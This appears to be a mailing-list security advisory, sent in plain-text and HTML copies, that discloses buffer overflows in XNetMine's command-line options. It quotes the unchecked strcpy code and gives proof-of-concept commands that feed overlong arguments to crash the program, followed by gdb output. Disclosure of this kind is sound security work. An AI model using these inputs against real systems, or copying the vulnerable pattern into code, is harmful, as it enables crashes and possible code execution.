XNetMine suffers from multiple buffer overflow exploits. PoC included that crashes XNetMine.
a2fc3791deffb5ecd911059e7f5a82944a96906478013639e2b12aabd27d7c48
This is a multi-part message in MIME format.
--------------070909050408080804050008
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
//
Vendor: Martin Bauer
Software: http://ibiblio.org/pub/Linux/games/multiplayer/XNetMine.tgz
*Vulnerable code:*
--
line: 672/676
if (strncmp("-PortNumber",argv[t+1],11)==0)
{ char text[500];
strcpy(text,argv[t+1]);
strcpy(Port,&text[11]);
}
--
line: 677/682
if (strncmp("-Name",argv[t+1],5)==0)
{
char text[500];
strcpy(text,argv[t+1]);
strcpy(User,&text[5]);
}
--
line: 683/688
if (strncmp("-ServerName",argv[t+1],11)==0)
{
char text[500];
strcpy(text,argv[t+1]);
strcpy(ServerName,&text[11]);
}
--
*Proof of concept:*
--
federico XNetMine % ./XNetMine -Server -PortNumber`perl -e 'print "A"x498'`
Server:1094795585 Client:0 PortNum:AAAAAAAAAAAAAAAAAAAAAAAAAAA(...)
ServerName:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(...)"
Segmentation fault
federico XNetMine % ./XNetMine -Server -PortNumber31337 -Name`perl -e 'print "A"x504'`
Server:1 Client:0 PortNum:AAAAAAAAAAAAAAAAAAAAAAAA
Name:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(...)" ServerName:""
Segmentation fault
federico XNetMine % ./XNetMine -Server -PortNumber31337 -Name31337 -ServerName`perl -e 'print "A"x504'`
Server:1 Client:0 PortNum:31337
Name:"31337" ServerName:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(...)"
Segmentation fault
--
*Debug information:*
--
(gdb) p $eip
$1 = (void (*)()) 0x804a862
(gdb) stepi
Program terminated with signal SIGSEGV, Segmentation fault.
The program no longer exists.
SIGSEGV 0x0804a862 in main ()
-- federico
federico@plugs.it / http://defsol.plugs.it/
//
--------------070909050408080804050008
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta content="text/html;charset=ISO-8859-1" http-equiv="Content-Type">
<title></title>
</head>
<body bgcolor="#ffffff" text="#000000">
<i><font><i>
<pre>Vendor: Martin Bauer
Software: <a class="moz-txt-link-freetext"
href="http://ibiblio.org/pub/Linux/games/multiplayer/XNetMine.tgz">http://ibiblio.org/pub/Linux/games/multiplayer/XNetMine.tgz</a>
<b>Vulnerable code:</b>
--
line: 672/676
if (strncmp("-PortNumber",argv[t+1],11)==0)
{ char text[500];
strcpy(text,argv[t+1]);
strcpy(Port,&text[11]);
}
--
line: 677/682
if (strncmp("-Name",argv[t+1],5)==0)
{
char text[500];
strcpy(text,argv[t+1]);
strcpy(User,&text[5]);
}
--
line: 683/688
if (strncmp("-ServerName",argv[t+1],11)==0)
{
char text[500];
strcpy(text,argv[t+1]);
strcpy(ServerName,&text[11]);
}
--
<b>Proof of concept:</b>
--
federico XNetMine % ./XNetMine -Server -PortNumber`perl -e 'print "A"x498'`
Server:1094795585 Client:0 PortNum:AAAAAAAAAAAAAAAAAAAAAAAAAAA(...)
ServerName:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(...)"
Segmentation fault
federico XNetMine % ./XNetMine -Server -PortNumber31337 -Name`perl -e 'print "A"x504'`
Server:1 Client:0 PortNum:AAAAAAAAAAAAAAAAAAAAAAAA
Name:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(...)" ServerName:""
Segmentation fault
federico XNetMine % ./XNetMine -Server -PortNumber31337 -Name31337 -ServerName`perl -e 'print "A"x504'`
Server:1 Client:0 PortNum:31337
Name:"31337" ServerName:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(...)"
Segmentation fault
--
<b>Debug information:</b>
--
(gdb) p $eip
$1 = (void (*)()) 0x804a862 <main+753>
(gdb) stepi
Program terminated with signal SIGSEGV, Segmentation fault.
The program no longer exists.
SIGSEGV 0x0804a862 in main ()
-- federico
<a class="moz-txt-link-abbreviated" href="mailto:federico@plugs.it">federico@plugs.it</a> / <a
class="moz-txt-link-freetext" href="http://defsol.plugs.it/">http://defsol.plugs.it/</a>
</main+753></pre>
</i></font></i>
</body>
</html>
--------------070909050408080804050008--